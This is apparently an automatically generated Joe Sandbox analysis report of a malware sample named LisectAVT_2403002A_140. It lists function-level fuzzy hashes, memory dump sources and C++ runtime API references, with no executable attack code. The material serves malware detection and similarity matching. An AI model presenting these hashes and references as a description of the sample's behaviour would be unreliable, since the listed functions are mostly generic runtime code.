                                  • Opcode Fuzzy Hash: 7a86bae7b52eba615fee289beb30cc65518e57e864a21739d599d2851cc85f02
                                  • Instruction Fuzzy Hash: C9815EB0C1834CAEDF08CFA4D8456EEBBB9EF56300F50809ED841AB651D7794249CBA5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4145669550.0000000000D21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D20000, based on PE: true
                                  • Associated: 00000000.00000002.4145585056.0000000000D20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145669550.0000000000E53000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145882356.0000000000E58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.0000000000E5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.0000000000FE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.00000000010CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.0000000001100000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4147310202.000000000111B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4147570115.00000000012C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_d20000_LisectAVT_2403002A_140.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: L$L
                                  • API String ID: 0-2020623011
                                  • Opcode ID: b48b70bf9382fe97d0301a7da437dc2734cc316c4374f6c1f4245a383f391751
                                  • Instruction ID: 2376f9278fbf3146856db9ff1b1b8166427a4f1ee06d62e91dd93712ed309e70
                                  • Opcode Fuzzy Hash: b48b70bf9382fe97d0301a7da437dc2734cc316c4374f6c1f4245a383f391751
                                  • Instruction Fuzzy Hash: A4712BB5D00266AFEB15CF69D8D07BEFBB5EB25308F040169E854A7782C734994AC7B0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4145669550.0000000000D21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D20000, based on PE: true
                                  • Associated: 00000000.00000002.4145585056.0000000000D20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145669550.0000000000E53000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145882356.0000000000E58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.0000000000E5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.0000000000FE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.00000000010CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.0000000001100000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4147310202.000000000111B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4147570115.00000000012C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_d20000_LisectAVT_2403002A_140.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: 0
                                  • API String ID: 0-4108050209
                                  • Opcode ID: 092342815b528e5b6d63dfea02b3071fef9f829637cb8f720479addf4d7ba7a6
                                  • Instruction ID: cacdeef65ab65dd375915412138dbd5edeb1cb51f0ca4e1a3ccf1c0d514a4593
                                  • Opcode Fuzzy Hash: 092342815b528e5b6d63dfea02b3071fef9f829637cb8f720479addf4d7ba7a6
                                  • Instruction Fuzzy Hash: CCB19D74A00646CFDB24CF68C890ABAB7B1FF05318F246719D9A6B72D2C731A985CB51
                                  APIs
                                  • GetSystemTimePreciseAsFileTime.KERNEL32(?,?,00DFEC78,?,?,?,?,00D340EB,?,00D83C2E), ref: 00DFF283
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4145669550.0000000000D21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D20000, based on PE: true
                                  • Associated: 00000000.00000002.4145585056.0000000000D20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145669550.0000000000E53000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145882356.0000000000E58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.0000000000E5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.0000000000FE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.00000000010CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.0000000001100000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4147310202.000000000111B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4147570115.00000000012C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_d20000_LisectAVT_2403002A_140.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Time$FilePreciseSystem
                                  • String ID:
                                  • API String ID: 1802150274-0
                                  • Opcode ID: c71a697dad466f9985d77cd5b209e2c945a1bc26970b453906732feb2ede54f1
                                  • Instruction ID: 666320d41ff0c8ec904a2a9fc41817ade8dc7ce9524264339b00e58e2632c319
                                  • Opcode Fuzzy Hash: c71a697dad466f9985d77cd5b209e2c945a1bc26970b453906732feb2ede54f1
                                  • Instruction Fuzzy Hash: 2FD0233654113C5745152BC1EC0487D77184F05750305C437DA06A3214CA515C0497E8
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4145669550.0000000000D21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D20000, based on PE: true
                                  • Associated: 00000000.00000002.4145585056.0000000000D20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145669550.0000000000E53000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145882356.0000000000E58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.0000000000E5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.0000000000FE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.00000000010CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.0000000001100000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4147310202.000000000111B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4147570115.00000000012C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_d20000_LisectAVT_2403002A_140.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d23d34740a60a0db1b62212d6abb4e08803f85f86d99ede1b5ff6f02f411aedd
                                  • Instruction ID: 093313ad08e3335fb49e2216bfd04048b75112eed78c0c90738b4c90da224c55
                                  • Opcode Fuzzy Hash: d23d34740a60a0db1b62212d6abb4e08803f85f86d99ede1b5ff6f02f411aedd
                                  • Instruction Fuzzy Hash: 82627EB0E002149FDF18CF59C5946ADFBF1AF8A304F2881ADD854AB346D735DA46CBA1
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4145669550.0000000000D21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D20000, based on PE: true
                                  • Associated: 00000000.00000002.4145585056.0000000000D20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145669550.0000000000E53000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145882356.0000000000E58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.0000000000E5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.0000000000FE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.00000000010CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.0000000001100000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4147310202.000000000111B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4147570115.00000000012C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_d20000_LisectAVT_2403002A_140.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4165833f375aa6f93db41442aa3d2db10f8894533c30b66aecbf6731423fbca4
                                  • Instruction ID: 8ab964d10460bff41626fa1aa29ab215042c3e2094e8bef37340d3b961ca23c6
                                  • Opcode Fuzzy Hash: 4165833f375aa6f93db41442aa3d2db10f8894533c30b66aecbf6731423fbca4
                                  • Instruction Fuzzy Hash: 57B1F3755007059BDB38AB64C892BFBB3E8EF44308F14553DE987E6580EA74E9C5CB90
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4145669550.0000000000D21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D20000, based on PE: true
                                  • Associated: 00000000.00000002.4145585056.0000000000D20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145669550.0000000000E53000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145882356.0000000000E58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.0000000000E5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.0000000000FE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.00000000010CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.0000000001100000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4147310202.000000000111B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4147570115.00000000012C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_d20000_LisectAVT_2403002A_140.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 44ad2981917a24add3c60b808d8dcaed526cfc4870c14c63f841f31c918598d9
                                  • Instruction ID: 1cd0388ff8267392d883448905b843e6f55ce177b4d0f1d38f23806f98a41a61
                                  • Opcode Fuzzy Hash: 44ad2981917a24add3c60b808d8dcaed526cfc4870c14c63f841f31c918598d9
                                  • Instruction Fuzzy Hash: D8B15C316106089FD719CF28C496BA57BE0FF45368F29965CE8DADF2A2C335E985CB40
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4145669550.0000000000D21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D20000, based on PE: true
                                  • Associated: 00000000.00000002.4145585056.0000000000D20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145669550.0000000000E53000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145882356.0000000000E58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.0000000000E5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.0000000000FE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.00000000010CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.0000000001100000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4147310202.000000000111B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4147570115.00000000012C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_d20000_LisectAVT_2403002A_140.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 671abae2bab33ba2931d639338142cd433631808412e7dd3e373e866f7148ca1
                                  • Instruction ID: b4ee744930fdf2134fb077667150184438755e70a34458edaea6b66f05fe0faf
                                  • Opcode Fuzzy Hash: 671abae2bab33ba2931d639338142cd433631808412e7dd3e373e866f7148ca1
                                  • Instruction Fuzzy Hash: 666146316101688FD714CF5FECC45263B66A78A30138B465AEBC1E73A6C735E92AD7A0
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4145669550.0000000000D21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D20000, based on PE: true
                                  • Associated: 00000000.00000002.4145585056.0000000000D20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145669550.0000000000E53000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145882356.0000000000E58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.0000000000E5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.0000000000FE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.00000000010CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.0000000001100000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4147310202.000000000111B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4147570115.00000000012C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_d20000_LisectAVT_2403002A_140.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d41d7c835665e109860553638f6406abd3f5ffd56976e93abe4b39ce6e5217a9
                                  • Instruction ID: ca868961e59976fcc83e6e1af5a851ada769ba7c3a7f1cf4b308248743d7ed8d
                                  • Opcode Fuzzy Hash: d41d7c835665e109860553638f6406abd3f5ffd56976e93abe4b39ce6e5217a9
                                  • Instruction Fuzzy Hash: 2F518AB1E002099FCB18DF98D881AEEBBB5FB89310F14456DE419B7351D734AA44CBB4
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4145669550.0000000000D21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D20000, based on PE: true
                                  • Associated: 00000000.00000002.4145585056.0000000000D20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145669550.0000000000E53000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145882356.0000000000E58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.0000000000E5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.0000000000FE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.00000000010CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.0000000001100000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4147310202.000000000111B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4147570115.00000000012C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_d20000_LisectAVT_2403002A_140.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 920c44e739ca4d08db5b5969fbc7a5a158caad0a814d8dad7807257cb044add9
                                  • Instruction ID: 5e78e8d15e46bf434feb5ff5b9f72dda89f5d3c8b3fe07f843f060ae6eff4d51
                                  • Opcode Fuzzy Hash: 920c44e739ca4d08db5b5969fbc7a5a158caad0a814d8dad7807257cb044add9
                                  • Instruction Fuzzy Hash: B4517F72D00219AFDF14CF98C941BEEBBB6FF88314F198459E915BB241D7349A90DB90
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4145669550.0000000000D21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D20000, based on PE: true
                                  • Associated: 00000000.00000002.4145585056.0000000000D20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145669550.0000000000E53000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145882356.0000000000E58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.0000000000E5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.0000000000FE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.00000000010CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.0000000001100000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4147310202.000000000111B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4147570115.00000000012C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_d20000_LisectAVT_2403002A_140.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                  • Instruction ID: 4a5acded9e1cefecb4742504c38a2508f82e5ddf140e4e10c2334e52e6ac2773
                                  • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                  • Instruction Fuzzy Hash: D3112BB724048243D6148A2DD8BC6B7E3D5EBD532872DA37ED3416B7D8E232DDC5A500
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4153594520.0000000005890000.00000040.00001000.00020000.00000000.sdmp, Offset: 05890000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5890000_LisectAVT_2403002A_140.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: af693d005e482924849b0b30b0cd8be0c2d69ec03865d89ae0304c4a11bc5417
                                  • Instruction ID: 3517beee5a6939466f9f3070b09a40e0701655ea368aa04b89e99042f6a0f558
                                  • Opcode Fuzzy Hash: af693d005e482924849b0b30b0cd8be0c2d69ec03865d89ae0304c4a11bc5417
                                  • Instruction Fuzzy Hash: 9EF02BD314C769EEA94FF0490A585B63B5FE1973743388137FC07CE153D2584D4A1121
                                  APIs
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00D8F833
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00D8F855
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00D8F875
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00D8F89F
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00D8F90D
                                  • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00D8F959
                                  • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00D8F973
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00D8FA08
                                  • std::_Facet_Register.LIBCPMT ref: 00D8FA15
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4145669550.0000000000D21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D20000, based on PE: true
                                  • Associated: 00000000.00000002.4145585056.0000000000D20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145669550.0000000000E53000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145882356.0000000000E58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.0000000000E5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.0000000000FE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.00000000010CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.0000000001100000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4147310202.000000000111B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4147570115.00000000012C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_d20000_LisectAVT_2403002A_140.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Locinfo::_$Facet_Locinfo_ctorLocinfo_dtorRegister
                                  • String ID: bad locale name$"
                                  • API String ID: 3375549084-2690866413
                                  • Opcode ID: d9d42386952f5705d3519ce29dfa303eeab9643dab5d31719fb4814e3f958a52
                                  • Instruction ID: c420e41be4601b67c7825a82e70dbf389e6c02ecce4f406ad9a7fd15af60d913
                                  • Opcode Fuzzy Hash: d9d42386952f5705d3519ce29dfa303eeab9643dab5d31719fb4814e3f958a52
                                  • Instruction Fuzzy Hash: AA616AB1D002189BEB10EFA4D845BAEBBB5EF14310F194469E845AB391EB74A905CBB1
                                  APIs
                                  • _ValidateLocalCookies.LIBCMT ref: 00E02E47
                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 00E02E4F
                                  • _ValidateLocalCookies.LIBCMT ref: 00E02ED8
                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 00E02F03
                                  • _ValidateLocalCookies.LIBCMT ref: 00E02F58
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4145669550.0000000000D21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D20000, based on PE: true
                                  • Associated: 00000000.00000002.4145585056.0000000000D20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145669550.0000000000E53000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145882356.0000000000E58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.0000000000E5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.0000000000FE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.00000000010CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.0000000001100000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4147310202.000000000111B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4147570115.00000000012C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_d20000_LisectAVT_2403002A_140.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                  • String ID: i$csm
                                  • API String ID: 1170836740-3794079885
                                  • Opcode ID: 1bff35a80dd7eed352c34217291d2592b440fa98577ea907ca0cda7bc6edc40b
                                  • Instruction ID: 5e7c52d7aa93ff0bd0bdcf228ec167a0967e1cf7773c3732a0c9af291f451ea3
                                  • Opcode Fuzzy Hash: 1bff35a80dd7eed352c34217291d2592b440fa98577ea907ca0cda7bc6edc40b
                                  • Instruction Fuzzy Hash: E541E970A002099FCF11DF68C889A9EBBF5AF44318F149059EA14BB3D2D731DE85CB91
                                  APIs
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00D23A58
                                  • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00D23AA4
                                  • __Getctype.LIBCPMT ref: 00D23ABA
                                  • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00D23AE6
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00D23B7B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4145669550.0000000000D21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D20000, based on PE: true
                                  • Associated: 00000000.00000002.4145585056.0000000000D20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145669550.0000000000E53000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145882356.0000000000E58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.0000000000E5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.0000000000FE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.00000000010CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.0000000001100000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4147310202.000000000111B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4147570115.00000000012C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_d20000_LisectAVT_2403002A_140.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: std::_$Locinfo::_Lockit$GetctypeLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                                  • String ID: bad locale name
                                  • API String ID: 1840309910-1405518554
                                  • Opcode ID: acd4eea1911e16d700ee583830f9a3a003f4ec2fb14d14e73230a6883c4f80df
                                  • Instruction ID: 5b52c7d6ae6be47f0a44d75de73c59b24666711f66312925afd696ce8d6b683e
                                  • Opcode Fuzzy Hash: acd4eea1911e16d700ee583830f9a3a003f4ec2fb14d14e73230a6883c4f80df
                                  • Instruction Fuzzy Hash: 865130B1D003589BDB10DFA4D845B9EBBF8EF14314F188069E909AB381E779DA04CB71
                                  APIs
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00D8DE93
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00D8DEB6
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00D8DED6
